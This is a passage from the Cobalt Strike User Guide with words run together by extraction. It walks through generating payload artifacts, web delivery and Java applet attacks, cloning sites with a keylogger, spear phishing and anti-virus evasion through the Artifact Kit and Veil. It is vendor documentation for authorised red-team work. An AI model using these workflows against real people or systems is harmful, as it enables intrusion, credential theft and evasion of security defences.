|
||
chooseoneofthefollowingoptions.
|
||
HTML Application
|
||
AnHTMLApplicationisaWindowsprogramwrittenInHTMLandanInternetExplorer
|
||
supportedscriptinglanguage.ThispackagegeneratesanHTMLApplicationthatrunsaCobalt
|
||
Strikelistener.
|
||
NavigatetoPayloads -> HTML Application.
|
||
CobaltStrikeUserGuide www.fortra.com page:68
|
||
|
||
InitialAccess/User-drivenAttackPackages
|
||
figure36-HTML ApplicationAttack
|
||
Parameters
|
||
Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
|
||
apayloadfor.
|
||
Method-Usethedrop-downtoselectoneofthefollowingmethodstoruntheselected
|
||
listener:
|
||
Executable:Thismethodwritesanexecutabletodiskandrunit.
|
||
PowerShell:ThismethodusesaPowerShellone-linertorunyourpayloadstager.
|
||
VBA:ThismethodusesaMicrosoftOfficemacrotoinjectyourpayloadinto
|
||
memory.TheVBAmethodrequiresMicrosoftOfficeonthetargetsystem.
|
||
PressGeneratetocreatetheHTMLApplication.
|
||
MS Office Macro
|
||
TheMicrosoftOfficeMacrotoolgeneratesamacrotoembedintoaMicrosoftWordor
|
||
MicrosoftExceldocument.
|
||
NavigatetoPayloads -> MS Office Macro.
|
||
CobaltStrikeUserGuide www.fortra.com page:69
|
||
|
||
InitialAccess/User-drivenAttackPackages
|
||
figure37-MSOfficeMacro
|
||
ChoosealistenerandpressGeneratetocreatethestep-by-stepinstructionstoembedyour
|
||
macrointoaMicrosoftWordorExceldocument.
|
||
Thisattackworkswellwhenyoucanconvinceausertorunmacroswhentheyopenyour
|
||
document.
|
||
Payload Generator
|
||
CobaltStrike'sPayloadGeneratoroutputssourcecodeandartifactstostageaCobaltStrike
|
||
listenerontoahost.ThinkofthisastheCobaltStrikeversionofmsfvenom.
|
||
NavigatetoPayloads -> Stager Payload Generator.
|
||
CobaltStrikeUserGuide www.fortra.com page:70
|
||
|
||
InitialAccess/User-drivenAttackPackages
|
||
figure38-PayloadGenerator
|
||
Parameters
|
||
Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
|
||
apayloadfor.
|
||
Output-Usethedrop-downtoselectoneofthefollowingoutputtypes(mostoptions
|
||
giveyoushellcodeformattedasabytearrayforthatlanguage):
|
||
C:Shellcodeformattedasabytearray.
|
||
C#:Shellcodeformattedasabytearray.
|
||
COM Scriptlet:A.sctfiletorunalistener
|
||
Java:Shellcodeformattedasabytearray.
|
||
Perl:Shellcodeformattedasabytearray.
|
||
PowerShell:PowerShellscripttorunshellcode
|
||
PowerShell Command:PowerShellone-linertorunaBeaconstager.
|
||
Python:Shellcodeformattedasabytearray.
|
||
Raw:blobofpositionindependentshellcode.
|
||
Ruby:Shellcodeformattedasabytearray.
|
||
Veil:CustomshellcodesuitableforusewiththeVeilEvasionFramework.
|
||
VBA:Shellcodeformattedasabytearray.
|
||
x64-Checktheboxtogenerateanx64stagerfortheselectedlistener.
|
||
PressGeneratetocreateaPayloadfortheselectedoutputtype.
|
||
Payload Generator (stageless)
|
||
CobaltStrike'sPayloadGeneratoroutputssourcecodeandartifacts,withoutastager,toa
|
||
CobaltStrikelistenerontoahost.
|
||
NavigatetoPayloads -> Stageless Payload Generator.
|
||
CobaltStrikeUserGuide www.fortra.com page:71
|
||
|
||
InitialAccess/User-drivenAttackPackages
|
||
figure39-StagelessPayloadGenerator
|
||
Parameters
|
||
Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
|
||
apayloadfor.
|
||
Guardrails-Ifyourlistenerhasbeenconfiguredwithgauardrails,thevalueisdisplayed
|
||
asthedefault.Usethe...buttontooverridethesettingsforthebeacon.
|
||
CobaltStrikeUserGuide www.fortra.com page:72
|
||
|
||
InitialAccess/User-drivenAttackPackages
|
||
figure40-GuardrailSettings
|
||
Output-Usethedrop-downtoselectoneofthefollowingoutputtypes(mostoptions
|
||
giveyoushellcodeformattedasabytearrayforthatlanguage):
|
||
C:Shellcodeformattedasabytearray.
|
||
C#:Shellcodeformattedasabytearray.
|
||
Java:Shellcodeformattedasabytearray.
|
||
Perl:Shellcodeformattedasabytearray.
|
||
Python:Shellcodeformattedasabytearray.
|
||
Raw:blobofpositionindependentshellcode.
|
||
Ruby:Shellcodeformattedasabytearray.
|
||
VBA:Shellcodeformattedasabytearray.
|
||
Exit Function-Thisfunctiondeterminesthemethod/behaviorthatBeaconuseswhen
|
||
theexitcommandisexecuted.
|
||
Process:Terminatesthewholeprocess.
|
||
Thread:Terminatesonlythecurrentthread.
|
||
System Call-Selectoneofthefollowingsystemcallmethodstouseatexecutiontime
|
||
whengeneratingastagelessbeaconpayloadfromtheCobaltStrikeUIora
|
||
supportedaggressorfunction:
|
||
None:UsethestandardWindowsAPIfunction.
|
||
CobaltStrikeUserGuide www.fortra.com page:73
|
||
|
||
InitialAccess/User-drivenAttackPackages
|
||
Direct:UsetheNt*versionofthefunction.
|
||
Indirect:JumptotheappropriateinstructionwithintheNt*versionofthe
|
||
function.
|
||
HTTP Library--SelecttheMicrosoftlibrary(WinINetorWinHTTP)forthegenerated
|
||
payload.
|
||
x64-Checktheboxtogenerateanx64stagerfortheselectedlistener.
|
||
PressGeneratetocreateaPayloadfortheselectedoutputtype.
|
||
Windows Executable
|
||
ThispackagegeneratesaWindowsexecutableartifactthatdeliversapayloadstager.
|
||
NavigatetoPayloads -> Windows Stager Payload.
|
||
figure41-WindowExecutable
|
||
Thispackageprovidesthefollowingoutputoptions:
|
||
Parameters
|
||
CobaltStrikeUserGuide www.fortra.com page:74
|
||
|
||
InitialAccess/User-drivenAttackPackages
|
||
Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
|
||
apayloadfor.
|
||
Output-Usethedrop-downtoselectoneofthefollowingoutputtypes.
|
||
Windows EXE:AWindowsexecutable.
|
||
Windows Service EXE:AWindowsexecutablethatrespondstoServiceControl
|
||
Managercommands.YoumayusethisexecutabletocreateaWindows
|
||
servicewithscorasacustomexecutablewiththeMetasploitFramework’s
|
||
PsExecmodules.
|
||
Windows DLL:AWindowsDLLthatexportsaStartWfunctionthatiscompatible
|
||
withrundll32.exe.Userundll32.exetoloadyourDLLfromthecommandline.
|
||
rundll32 foo.dll,StartW
|
||
x64-Checktheboxtogeneratex64artifactsthatpairwithanx64stager.Bydefault,
|
||
thisdialogexportsx64payloadstagers.
|
||
sign-ChecktheboxtosignanEXEorDLLartifactwithacode-signingcertificate.You
|
||
mustspecifyacertificateinaMalleableC2profile.
|
||
PressGeneratetocreateapayloadstagerartifact.
|
||
CobaltStrikeusesitsArtifactKittogeneratethisoutput.
|
||
Windows Executable (Stageless)
|
||
ThispackageexportsBeacon,withoutastager,asanexecutable,serviceexecutable,32-bitDLL,
|
||
or64-bitDLL.Apayloadartifactthatdoesnotuseastageriscalledastagelessartifact.This
|
||
packagealsohasaPowerShelloptiontoexportBeaconasaPowerShellscriptandarawoption
|
||
toexportBeaconasablobofpositionindependentcode.
|
||
NavigatetoPayloads -> Windows Stageless Payload.
|
||
CobaltStrikeUserGuide www.fortra.com page:75
|
||
|
||
InitialAccess/User-drivenAttackPackages
|
||
figure42-WindowsStagelessExecutable
|
||
Thispackageprovidesthefollowingoutputoptions:
|
||
Parameters
|
||
Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
|
||
apayloadfor.
|
||
Guardrails-Ifyourlistenerhasbeenconfiguredwithgauardrails,thevalueisdisplayed
|
||
asthedefault.Usethe...buttontooverridethesettingsforthebeacon.
|
||
CobaltStrikeUserGuide www.fortra.com page:76
|
||
|
||
InitialAccess/User-drivenAttackPackages
|
||
figure43-GuardrailSettings
|
||
Output-Usethedrop-downtoselectoneofthefollowingoutputtypes.
|
||
PowerShell:APowerShellscriptthatinjectsastagelessBeaconintomemory.
|
||
Raw:AblobofpositionindependentcodethatcontainsBeacon.
|
||
Windows EXE:AWindowsexecutable.
|
||
Windows Service EXE:AWindowsexecutablethatrespondstoServiceControl
|
||
Managercommands.YoumayusethisexecutabletocreateaWindows
|
||
servicewithscorasacustomexecutablewiththeMetasploitFramework's
|
||
PsExecmodules.
|
||
Windows DLL:AWindowsDLLthatexportsaStartWfunctionthatiscompatible
|
||
withrundll32.exe.Userundll32.exetoloadyourDLLfromthecommandline.
|
||
rundll32 foo.dll,StartW
|
||
Exit Function-Thisfunctiondeterminesthemethod/behaviorthatBeaconuseswhen
|
||
theexitcommandisexecuted.
|
||
Process:Terminatesthewholeprocess.
|
||
Thread:Terminatesonlythecurrentthread.
|
||
System Call-Selectoneofthefollowingsystemcallmethodstouseatexecutiontime
|
||
whengeneratingastagelessbeaconpayloadfromtheCobaltStrikeUIora
|
||
supportedaggressorfunction:
|
||
None:UsethestandardWindowsAPIfunction.
|
||
CobaltStrikeUserGuide www.fortra.com page:77
|
||
|
||
InitialAccess/User-drivenAttackPackages
|
||
Direct:UsetheNt*versionofthefunction.
|
||
Indirect:JumptotheappropriateinstructionwithintheNt*versionofthe
|
||
function.
|
||
HTTP Library--SelecttheMicrosoftlibrary(WinINetorWinHTTP)forthegenerated
|
||
payload.
|
||
x64-Checktheboxtogenerateanx64artifactthatcontainsanx64payload.By
|
||
default,thisdialogexportsx64payloads.
|
||
sign-ChecktheboxtosignanEXEorDLLartifactwithacode-signingcertificate.You
|
||
mustspecifyacertificateinaMalleableC2profile.
|
||
PressGeneratetocreateastagelessartifact.
|
||
CobaltStrikeusesitsArtifactKittogeneratethisoutput.
|
||
Windows Executable (Stageless)Variants
|
||
Thisoptiongeneratesallofthestagelesspayloads(inx86andx64)foralloftheconfigured
|
||
listeners.
|
||
NavigatetoPayloads -> Windows Stageless Generate All Payloads.
|
||
figure44-WindowsStagelessExecutableVariants
|
||
Parameters
|
||
CobaltStrikeUserGuide www.fortra.com page:78
|
||
|
||
InitialAccess/HostingFiles
|
||
Folder-Pressthefolderbuttontoselectalocationtosavethelistener(s).
|
||
System Call-Selectoneofthefollowingsystemcallmethodstouseatexecutiontime
|
||
whengeneratingastagelessbeaconpayloadfromtheCobaltStrikeUIora
|
||
supportedaggressorfunction:
|
||
None:UsethestandardWindowsAPIfunction.
|
||
Direct:UsetheNt*versionofthefunction.
|
||
Indirect:JumptotheappropriateinstructionwithintheNt*versionofthe
|
||
function.
|
||
HTTP Library--SelecttheMicrosoftlibrary(WinINetorWinHTTP)forthegenerated
|
||
payload.
|
||
Sign-ChecktheboxtosignanEXEorDLLartifactwithacode-signingcertificate.You
|
||
mustspecifyacertificateinaMalleableC2profile.
|
||
PressGeneratetocreateastagelessartifact.
|
||
Hosting Files
|
||
CobaltStrike’swebservercanhostyouruser-drivenpackagesforyou.Fromthemenu,select
|
||
Site Management -> Host Fileandperformthefollowingtosetup:
|
||
1. Choosethefiletohost
|
||
2. SelectanarbitraryURL
|
||
3. Choosethemimetypeforthefile.
|
||
Byitself,thecapabilitytohostafileisn’tveryimpressive.However,insectionsthatfollow,you
|
||
willlearnhowtoembedCobaltStrikeURLsintoaspearphishingemail.Whenyoudothis,
|
||
CobaltStrikecancross-referencevisitorstoyourfilewithsentemailsandincludethis
|
||
informationinthesocialengineeringreport.
|
||
CheckEnable SSLtoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya
|
||
validSSLcertificateinyourMalleableC2profile.
|
||
User-driven Web Drive-by Attacks
|
||
CobaltStrikeUserGuide www.fortra.com page:79
|
||
|
||
InitialAccess/User-drivenWebDrive-byAttacks
|
||
CobaltStrikemakesseveraltoolstosetupwebdrive-byattacksavailabletoyou.Toquicklystart
|
||
anattack,navigatetoAttacksandchooseoneofthefollowingoption:
|
||
Java Signed Applet Attack
|
||
Thisattackstartsawebserverhostingaself-signedJavaapplet.Visitorsareaskedtogivethe
|
||
appletpermissiontorun.Whenavisitorgrantsthispermission,yougainaccesstotheirsystem.
|
||
TheJavaSignedAppletAttackusesCobaltStrike’sJavainjector.OnWindows,theJavainjector
|
||
willinjectshellcodeforaWindowslistenerdirectlyintomemoryforyou.
|
||
NavigatetoAttacks -> Signed Applet Attack.
|
||
figure45-SignedAppletAttack
|
||
Parameters
|
||
Local URL/Host/Path-SettheLocalURLPath,HostandPorttoconfigurethe
|
||
webserver.
|
||
Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
|
||
apayloadfor.
|
||
SSL-ChecktoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya
|
||
validSSLcertificateinyourMalleableC2profile.
|
||
PressLaunchtostarttheattack.
|
||
CobaltStrikeUserGuide www.fortra.com page:80
|
||
|
||
InitialAccess/User-drivenWebDrive-byAttacks
|
||
Java Smart Applet Attack
|
||
CobaltStrike’sSmartAppletAttackcombinesseveralexploitstodisabletheJavasecurity
|
||
sandboxintoonepackage.ThisattackstartsawebserverhostingaJavaapplet.Initially,this
|
||
appletrunsinJava’ssecuritysandboxanditdoesnotrequireuserapprovaltostart.
|
||
TheappletanalyzesitsenvironmentanddecideswhichJavaexploittouse.IftheJavaversion
|
||
isvulnerable,theappletwilldisablethesecuritysandbox,andexecuteapayloadusingCobalt
|
||
Strike’sJavainjector.
|
||
NavigatetoAttacks -> Smart Applet Attack.
|
||
figure46-SmartAppletAttack
|
||
Parameters
|
||
Local URL/Host/Path-SettheLocalURLPath,HostandPorttoconfigurethe
|
||
webserver.
|
||
Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
|
||
apayloadfor.
|
||
SSL-ChecktoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya
|
||
validSSLcertificateinyourMalleableC2profile.
|
||
PressLaunchtostarttheattack.
|
||
Scripted Web Delivery (S)
|
||
CobaltStrikeUserGuide www.fortra.com page:81
|
||
|
||
InitialAccess/User-drivenWebDrive-byAttacks
|
||
ThisfeaturegeneratesastagelessBeaconpayloadartifact,hostsitonCobaltStrike’sweb
|
||
server,andpresentsaone-linertodownloadandruntheartifact.
|
||
NavigatetoAttacks -> Scripted Web Delivery (S)fromthemenu.
|
||
figure47-ScrptedWebDelivery(S)
|
||
Parameters
|
||
Local URL/Host/Path-SettheLocalURLPath,HostandPorttoconfigurethe
|
||
webserver.MakesuretheHostfieldmatchestheCNfieldofyourSSLcertificate.
|
||
Thiswillavoidasituationwherethisfeaturefailsbecauseofamismatch
|
||
betweenthesefields.
|
||
Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
|
||
apayloadfor.
|
||
Type-Usethedrop-downmenutoselectoneofthefollowingtypes:
|
||
bitsadmin :Thisoptionhostsanexecutableandusesbitsadmintodownloadit.
|
||
Thebitsadminmethodrunstheexecutableviacmd.exe.
|
||
exe :ThisoptiongeneratesanexecutableandhostsitonCobaltStrike’sweb
|
||
server.
|
||
CobaltStrikeUserGuide www.fortra.com page:82
|
||
|
||
InitialAccess/Client-sideExploits
|
||
powershell ThisoptionhostsaPowerShellscriptandusespowershell.exeto
|
||
downloadthescriptandevaluateit.
|
||
powershell IEX :ThisoptionhostsaPowerShellscriptandusespowershell.exe
|
||
todownloadthescriptandevaluateit.Similartopriorpowershell option,but
|
||
itprovidesashorterInvoke-Executionone-linercommand.
|
||
python : ThisoptionhostsaPythonscriptandusespython.exetodownloadthe
|
||
scriptandrunit.EachoftheseoptionsisadifferentwaytorunaCobaltStrike
|
||
listener.
|
||
x64-Checktheboxtogenerateanx64stagerfortheselectedlistener.
|
||
SSL-ChecktoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya
|
||
validSSLcertificateinyourMalleableC2profile.
|
||
PressLaunchtostarttheattack.
|
||
Client-side Exploits
|
||
YoumayuseaMetasploitFrameworkexploittodeliveraCobaltStrikeBeacon.CobaltStrike’s
|
||
BeaconiscompatiblewiththeMetasploitFramework’sstagingprotocol.TodeliveraBeacon
|
||
withaMetasploitFrameworkexploit:
|
||
l Usewindows/meterpreter/reverse_http[s]asyourPAYLOADandsetLHOSTandLPORT
|
||
topointtoyourCobaltStrikelistener.You’renotreallydeliveringMeterpreterhere,you’re
|
||
tellingtheMetasploitFrameworktogeneratetheHTTP[s]stagerthatdownloadsa
|
||
payloadfrom thespecifiedLHOST/LPORT.
|
||
l SetDisablePayloadHandlertoTrue.ThiswilltelltheMetasploitFrameworktoavoid
|
||
standingupahandlerwithintheMetasploitFrameworktoserviceyourpayload
|
||
connection.
|
||
l SetPrependMigratetoTrue.ThisoptiontellstheMetasploitFrameworktoprepend
|
||
shellcodethatrunsthepayloadstagerinanotherprocess.ThishelpsyourBeacon
|
||
sessionsurvivesiftheexploitedapplicationcrashesorifit’sclosedbyauser.
|
||
Here’sascreenshotofmsfconsoleusedtostandupaFlashExploittodeliverCobaltStrike’s
|
||
HTTPBeaconhostedat192.168.1.5onport80:
|
||
CobaltStrikeUserGuide www.fortra.com page:83
|
||
|
||
InitialAccess/CloneaSite
|
||
figure48-UsingClient-sideAttacksfromMetasploit
|
||
Clone a Site
|
||
Beforesendinganexploittoatarget,ithelpstodressitup.CobaltStrike’swebsiteclonetoolcan
|
||
helpwiththis.Thewebsiteclonetoolmakesalocalcopyofawebsitewithsomecodeaddedto
|
||
fixlinksandimagessotheyworkasexpected.
|
||
Tocloneawebsite,gotoSite Management -> Clone Site.
|
||
figure49-WebsiteCloneTool
|
||
CobaltStrikeUserGuide www.fortra.com page:84
|
||
|
||
InitialAccess/SpearPhishing
|
||
It’spossibletoembedanattackintoaclonedsite.WritetheURLofyourattackintheEmbed
|
||
fieldandCobaltStrikewilladdittotheclonedsitewithanIFRAME.Clickthe... buttontoselect
|
||
oneoftherunningclient-sideexploits.
|
||
Clonedwebsitescanalsocapturekeystrokes.ChecktheLog keystrokes on cloned sitebox.
|
||
ThiswillinsertaJavaScriptkeyloggerintotheclonedsite.
|
||
Toviewloggedkeystrokesorseevisitorstoyourclonedsite,gotoView -> Web Log.
|
||
CheckEnable SSLtoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya
|
||
validSSLcertificateinyourMalleableC2profile.MakesuretheHostfieldmatchestheCNfield
|
||
ofyourSSLcertificate.Thiswillavoidasituationwherethisfeaturefailsbecauseofamismatch
|
||
betweenthesefields.
|
||
Spear Phishing
|
||
Nowthatyouhaveanunderstandingofclient-sideattacks,let’stalkabouthowtogettheattack
|
||
totheuser.Themostcommonwayintoanorganization’snetworkisthroughspearphishing.
|
||
CobaltStrike'sspearphishingtoolallowsyoutosendpixelperfectspearphishingmessages
|
||
usinganarbitrarymessageasatemplate.
|
||
Targets
|
||
Beforeyousendaphishingmessage,youshouldassemblealistoftargets.CobaltStrike
|
||
expectstargetsinatextfile.Eachlineofthefilecontainsonetarget.Thetargetmaybeanemail
|
||
address.Youmayalsouseanemailaddress,atab,andaname.Ifprovided,anamehelps
|
||
CobaltStrikecustomizeeachphish.
|
||
Templates
|
||
Next,youneedaphishingtemplate.Thenicethingabouttemplatesisthatyoumayreusethem
|
||
betweenengagements.CobaltStrikeusessavedemailmessagesasitstemplates.Cobalt
|
||
Strikewillstripattachments,dealwithencodingissues,andrewriteeachtemplateforeach
|
||
phishingattack.
|
||
Ifyou’dliketocreateacustomtemplate,composeamessageandsendittoyourself.Most
|
||
emailclientshaveawaytogettheoriginalmessagesource.InGmail,clickthedownarrownext
|
||
toReply andselectShow original.Savethismessagetoafileandthencongratulateyourself—
|
||
you’vemadeyourfirstCobaltStrikephishingtemplate.
|
||
YoumaywanttocustomizeyourtemplatewithCobaltStrike’stokens.CobaltStrikereplaces
|
||
thefollowingtokensinyourtemplates:
|
||
CobaltStrikeUserGuide www.fortra.com page:85
|
||
|
||
InitialAccess/SpearPhishing
|
||
Token Description
|
||
%To% Theemailaddressofthepersonthemessageissentto
|
||
%To_Name% Thenameofthepersonthemessageissentto.
|
||
%URL% ThecontentsoftheEmbedURLfieldinthespearphishingdialog.
|
||
Sending Messages
|
||
Nowthatyouhaveyourtargetsandatemplate,you’rereadytogophishing.Tostartthespear
|
||
phishingtool,gotoAttacks ->Spear Phish.
|
||
figure50-SpearPhishingTool
|
||
Tosendaphishingmessage,youmustfirstimportyourlistofTargets.Youmayimportaflat
|
||
text-filecontainingoneemailaddressperline.Importafilecontainingoneemailaddressand
|
||
nameseparatedbyataborcommaforstrongermessagecustomization.Clickthefoldernext
|
||
totheTargetsfieldtoimportyourtargetsfile.
|
||
SetTemplatetoanemailmessagetemplate.ACobaltStrikemessagetemplateissimplya
|
||
savedemailmessage.CobaltStrikewillstripunnecessaryheaders,removeattachments,
|
||
rewriteURLs,re-encodethemessage,andrewriteitforyou.Clickonthefoldernexttothe
|
||
Templatefieldtochooseone.
|
||
CobaltStrikeUserGuide www.fortra.com page:86
|
||
|
||
InitialAccess/SpearPhishing
|
||
YouhavetheoptiontoaddanAttachment.Thisisagreattimetouseoneofthesocial
|
||
engineeringpackagesdiscussedearlier.CobaltStrikewilladdyourattachmenttotheoutgoing
|
||
phishingmessage.
|
||
CobaltStrikedoesnotgiveyouameanstocomposeamessage.Useanemailclient,writea
|
||
message,andsendittoyourself.Mostwebmailclientsincludeameanstoseetheoriginal
|
||
messagesource.InGMail,clickthedownarrownexttoReplyandselectShoworiginal.
|
||
YoumayalsoaskCobaltStriketorewriteallURLsinthetemplatewithaURLofyourchoosing.
|
||
SetEmbed URLtohaveCobaltStrikerewriteeachURLinthemessagetemplatetopointtothe
|
||
embeddedURL.URLsaddedinthiswaywillcontainatokenthatallowsCobaltStriketotrace
|
||
anyvisitorbacktothisparticularspearphishingattack.CobaltStrike'sreportingandweblog
|
||
featurestakeadvantageofthistoken.Press...tochooseoneoftheCobaltStrikehostedsites
|
||
you'vestarted.
|
||
WhenyouembedaURL,CobaltStrikewillattach?id=%TOKEN%toit.Eachsentmessagewill
|
||
getitsowntoken.CobaltStrikeusesthistokentomapwebsitevisitorstosentemails.Ifyou
|
||
careaboutreporting,besuretokeepthisvalueinplace.
|
||
SetMail Servertoanopenrelayorthemailexchangerecordforyourtarget.Ifnecessary,you
|
||
mayalsoauthenticatetoamailservertosendyourphishingmessages.
|
||
Press… nexttotheMailServerfieldtoconfigureadditionalserveroptions.Youmayspecifya
|
||
usernameandpasswordtoauthenticatewith.TheRandomDelayoptiontellsCobaltStriketo
|
||
randomlydelayeachmessagebyarandomtime,uptothenumberofsecondsyouspecify.If
|
||
thisoptionisnotset,CobaltStrikewillnotdelayitsmessages.
|
||
figure51-ConfigureMailServer
|
||
SetBounce Totoanemailaddresswherebouncedmessagesshouldgo.Thisvaluewillnot
|
||
affectthemessageyourtargetssee.PressPreview toseeanassembledmessagetooneof
|
||
yourrecipients.Ifthepreviewlooksgood,pressSend todeliveryourattack.
|
||
CobaltStrikeUserGuide www.fortra.com page:87
|
||
|
||
InitialAccess/SpearPhishing
|
||
CobaltStrikesendsphishingmessagesthroughtheteamserver.
|
||
CobaltStrikeUserGuide www.fortra.com page:88
|
||
|
||
PayloadArtifactsandAnti-virusEvasion/TheArtifactKit
|
||
Payload Artifacts and Anti-virus
|
||
Evasion
|
||
Fortraregularlyfieldsquestionsaboutevasion.DoesCobaltStrikebypassanti-virusproducts?
|
||
Whichanti-virusproductsdoesitbypass?Howoftenisthischecked?
|
||
TheCobaltStrikedefaultartifactswilllikelybesnaggedbymostendpointsecuritysolutions.
|
||
AlthoughevasionisnotagoalofthedefaultCobaltStrikeproduct,CobaltStrikedoesoffer
|
||
someflexibility.
|
||
You,theoperator,maychangetheexecutables,DLLs,applets,andscripttemplatesCobalt
|
||
Strikeusesinitsworkflows.YoumayalsoexportCobaltStrike’sBeaconpayloadinavarietyof
|
||
formatsthatworkwiththird-partytoolsdesignedtoassistwithevasion.
|
||
ThischapterhighlightstheCobaltStrikefeaturesthatprovidethisflexibility.
|
||
The Artifact Kit
|
||
CobaltStrikeusestheArtifactKittogenerateitsexecutablesandDLLs.TheArtifactKitispartof
|
||
theArsenalKit,whichcontainsacollectionofkits—asourcecodeframeworktobuild
|
||
executablesandDLLsthatevadesomeanti-virusproducts.
|
||
The Theory of the Artifact Kit
|
||
Traditionalanti-virusproductsusesignaturestoidentifyknownbad.Ifweembedourknown
|
||
badshellcodeintoanexecutable,ananti-virusproductwillrecognizetheshellcodeandflagthe
|
||
executableasmalicious.
|
||
Todefeatthisdetection,it’scommonforanattackertoobfuscatetheshellcodeinsomeway
|
||
andplaceitinthebinary.Thisobfuscationprocessdefeatsanti-virusproductsthatuseasimple
|
||
stringsearchtoidentifymaliciouscode.
|
||
Manyanti-virusproductsgoastepfurther.Theseanti-virusproductssimulateexecutionofan
|
||
executableinavirtualsandbox.Witheachemulatedstepofexecution,theanti-virusproduct
|
||
checksforknownbadintheemulatedprocessspace.Ifknownbadshowsup,theanti-virus
|
||
productflagstheexecutableorDLLasmalicious.Thistechniquedefeatsmanyencodersand
|
||
packersthattrytohideknownbadfromsignature-basedanti-virusproducts.
|
||
CobaltStrike’scountertothisissimple.Theanti-virussandboxhaslimitations.Itisnota
|
||
completevirtualmachine.Therearesystembehaviorstheanti-virussandboxdoesnotemulate.
|
||
CobaltStrikeUserGuide www.fortra.com page:89
|
||
|
||
PayloadArtifactsandAnti-virusEvasion/TheArtifactKit
|
||
TheArtifactKitisacollectionofexecutableandDLLtemplatesthatrelyonsomebehaviorthat
|
||
anti-virusproduct’sdonotemulatetorecovershellcodelocatedinsideofthebinary.
|
||
Oneofthetechniques[see:src-common/bypass-pipe.cintheArtifactKit]generates
|
||
executablesandDLLsthatserveshellcodetothemselvesoveranamedpipe.Ifananti-virus
|
||
sandboxdoesnotemulatenamedpipes,itwillnotfindtheknownbadshellcode.
|
||
Where Artifact Kit Fails
|
||
Ofcourseit’spossibleforanti-virusproductstodefeatspecificimplementationsoftheArtifact
|
||
Kit.Ifananti-virusvendorwritessignaturesfortheArtifactKittechniqueyouuse,thenthe
|
||
executablesandDLLsitcreateswillgetcaught.Thisstartedtohappen,overtime,withthe
|
||
defaultbypasstechniqueinCobaltStrike2.5andbelow.Ifyouwanttogetthemostfromthe
|
||
ArtifactKit,youwilluseoneofitstechniquesasabasetobuildyourownArtifactKit
|
||
implementation.
|
||
Eventhatisn’tenoughthough.Someanti-virusproductscallhometotheanti-virusvendor’s
|
||
servers.TherethevendormakesadeterminationiftheexecutableorDLLisknowngoodoran
|
||
unknown,neverbeforeseen,executableorDLL.Someoftheseproductsautomaticallysend
|
||
unknownexecutablesandDLLstothevendorforfurtheranalysisandwarntheusers.Others
|
||
treatunknownexecutablesandDLLsasmalicious.Itdependsontheproductanditssettings.
|
||
Thepoint:noamountof“obfuscation”isgoingtohelpyouinthissituation.You’reupagainsta
|
||
differentkindofdefenseandwillneedtoworkarounditaccordingly.Treatthesesituationsthe
|
||
samewayyouwouldtreatapplicationwhitelisting.Trytofindaknowngoodprogram(e.g.,
|
||
powershell)thatwillgetyourpayloadstagerintomemory.
|
||
How to use the Artifact Kit
|
||
GotoHelp ->Arsenal fromalicensedCobaltStriketodownloadtheArsenalKit.Youcanalso
|
||
accesstheArsenaldirectlyat:https://www.cobaltstrike.com/scripts
|
||
FortradistributestheArsenalKitasa.tgzfile.Usethetarcommandtoextractit.TheArsenalKit
|
||
includestheArtifactkit,whichcanbebuiltwithotherkitsorasastandalonekit.SeetheArsenal
|
||
KitREADME.mdfileforinformationonbuildingthekits.
|
||
You’reencouragedtomodifytheArtifactKitanditstechniquestomakeitmeetyourneeds.
|
||
WhileskilledCprogrammerscandomorewiththeArtifactKit,it’squitefeasibleforan
|
||
adventurousnon-programmertoworkwiththeArtifactKittoo.Forexample,amajoranti-virus
|
||
productlikestowritesignaturesfortheexecutablesinCobaltStrike’strialeachtimethereisa
|
||
release.UpuntilCobaltStrike2.5,thetrialandlicensedversionsofCobaltStrikeusedthenamed
|
||
pipetechniqueinitsexecutablesandDLLs.Thisvendorwouldwriteasignatureforthenamed
|
||
CobaltStrikeUserGuide www.fortra.com page:90
|
||
|
||
PayloadArtifactsandAnti-virusEvasion/TheVeilEvasionFramework
|
||
pipestringtheexecutableused.Defeatingtheirsignatures,releaseafterrelease,wasassimple
|
||
aschangingthenameofthepipeinthepipetechnique’ssourcecode.
|
||
The Veil Evasion Framework
|
||
Veilisapopularframeworktogenerateexecutablesthatgetpastsomeanti-virusproducts.You
|
||
mayuseVeiltogenerateexecutablesforCobaltStrike’spayloads.
|
||
Steps
|
||
1. GotoPayloads -> Stager Payload Generator.
|
||
2. Choosethelisteneryouwanttogenerateanexecutablefor.
|
||
3. SelectVeilastheOutputtype.
|
||
4. PressGenerateandsavethefile.
|
||
5. LaunchtheVeil Evasion Frameworkandchoosethetechniqueyouwanttouse.
|
||
6. Veilwilleventuallyaskaboutshellcode.SelectVeil’soptiontosupplycustom shellcode.
|
||
7. PasteinthecontentsofthefileCobaltStrike’spayloadgeneratormade.
|
||
8. PressenterandyouwillhaveafreshVeil-madeexecutable.
|
||
figure 52 - UsingVeiltoGenerateanExecutable
|
||
Java Applet Attacks
|
||
FortradistributesthesourcecodetoCobaltStrike’sAppletAttacksastheAppletKit.Thisisalso
|
||
availablewithintheCobaltStrikearsenal.GotoHelp ->Arsenal anddownloadtheAppletKit.
|
||
Usetheincludedbuild.shscripttobuildtheAppletKitonKaliLinux.ManyCobaltStrike
|
||
customersusethisflexibilitytosignCobaltStrike’sJavaAppletattackswithacode-signing
|
||
certificatethattheypurchased.Thisishighlyrecommended.
|
||
CobaltStrikeUserGuide www.fortra.com page:91
|
||
|
||
PayloadArtifactsandAnti-virusEvasion/TheResourceKit
|
||
TomakeCobaltStrikeuseyourAppletKitoverthebuilt-inone,loadtheapplet.cnascript
|
||
includedwiththeAppletKit.
|
||
OntheCobaltStrikeArsenalPageyouwillalsonoticethePower Applet.Thisisanalternate
|
||
implementationofCobaltStrike’sJavaAppletattacksthatusesPowerShelltogetapayload
|
||
